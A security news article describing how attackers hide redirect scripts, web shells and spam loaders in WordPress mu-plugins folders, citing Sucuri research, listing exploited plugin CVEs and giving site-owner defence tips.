WordPress is one of the most popular platforms for building websites, but it’s also a prime target for cybercriminals looking to exploit vulnerabilities. Recently, a new trend has emerged: hackers are hiding malicious code in a specific folder within WordPress, known as the “mu-plugins” directory, to maintain remote access to sites and redirect unsuspecting visitors to harmful pages.
What Are mu-plugins?
“MU-plugins” stands for “Must-Use Plugins,” and they are stored in a special folder called wp-content/mu-plugins. Unlike regular plugins that need to be manually activated via the WordPress admin dashboard, MU-plugins automatically load when WordPress starts up. This feature makes them especially appealing for hackers who want to sneak malware into websites unnoticed.
Since MU-plugins don’t appear in the usual WordPress plugin interface, they are often overlooked during routine security checks, allowing hackers to carry out their attacks in relative secrecy.
The Malicious Trend: Redirects, Web Shells, and Spam
Researchers from the website security firm Sucuri have recently analyzed several incidents where hackers used MU-plugins to deliver different types of malicious scripts. Here’s a look at some of the most common ones:
Redirect.php: This script redirects site visitors to malicious websites, often masquerading as a legitimate browser update. This tactic is used to trick users into downloading malware, which could steal personal information or load additional harmful payloads onto their systems.
Index.php: A more dangerous type of attack, this script acts like a “web shell.” It lets hackers execute arbitrary code by downloading a remote PHP script. This gives them full control over the infected site.
Custom-js-loader.php: This script replaces images on the site with explicit content and hijacks outbound links, potentially leading visitors to scammy websites. It may also manipulate SEO rankings, making it a harmful nuisance for website owners.
The Power of Deception
One particularly insidious feature of these attacks is that the redirect.php script has the ability to identify bots. This means it can avoid redirecting search engine crawlers, preventing these automated bots from detecting the malicious behavior. As a result, hackers can go unnoticed for longer, while real users are directed to harmful sites.
Why Is This Such a Big Deal?
These attacks are part of a broader trend where compromised WordPress sites are used to deploy malicious JavaScript. The goal is often to redirect users to third-party sites or steal financial information entered during checkout. This has become a serious problem, especially when hackers trick visitors into running malware under the guise of legitimate security checks like Google reCAPTCHA.
How Are WordPress Sites Being Breached?
While it’s still unclear how exactly these sites are being hacked, there are a few common vulnerabilities that could be to blame. These include weak admin passwords, vulnerable plugins or themes, and improper server configurations. It’s essential for WordPress site owners to be vigilant about these potential entry points.
Plugin Vulnerabilities You Should Know About
In 2025 alone, hackers have exploited several critical vulnerabilities in WordPress plugins to gain unauthorized access:
- CVE-2024-27956: A serious flaw in the WordPress Automatic Plugin (AI content generator and auto poster) that allows unauthorized SQL execution.
- CVE-2024-25600: A vulnerability in the Bricks theme that lets attackers execute remote code on the website.
- CVE-2024-8353: A vulnerability in the GiveWP plugin that allows attackers to execute remote code via PHP object injection.
- CVE-2024-4345: A file upload vulnerability in the Startklar Elementor Addons for WordPress that lets attackers upload arbitrary files to the server.
How Can You Protect Your WordPress Site?
As these attacks grow more sophisticated, it’s crucial for WordPress site owners to take proactive measures to secure their sites. Here are some tips to help you defend against these types of threats:
Keep Plugins and Themes Up-to-Date
Ensure that all your plugins and themes are running the latest versions, as outdated software can leave your site vulnerable.
Audit Your Plugins and Code Regularly
Review all plugins installed on your site, active or inactive, and if possible run periodic scans utilizing your web host’s scan tool if available or a security plugin such as Wordfence to check for malware or suspicious code within your WordPress website files.
Enforce Strong Passwords
Use complex, unique passwords for your admin and editor/contributor accounts, and encourage your users to do the same.
Use a Web Application Firewall (WAF)
A WAF can block malicious requests and prevent code injections, making it harder for hackers to compromise your site. They also help in minimizing impact on resource usage through caching and CDN (content delivery network) services. There are many popular options available, including Cloudflare or Akamai.
Read more on Sucuri’s analysis report on on their website blog post here.
Staying informed and implementing best security best practices can help you protect your WordPress site from malicious attacks and keep your visitors safe.
Leave a Reply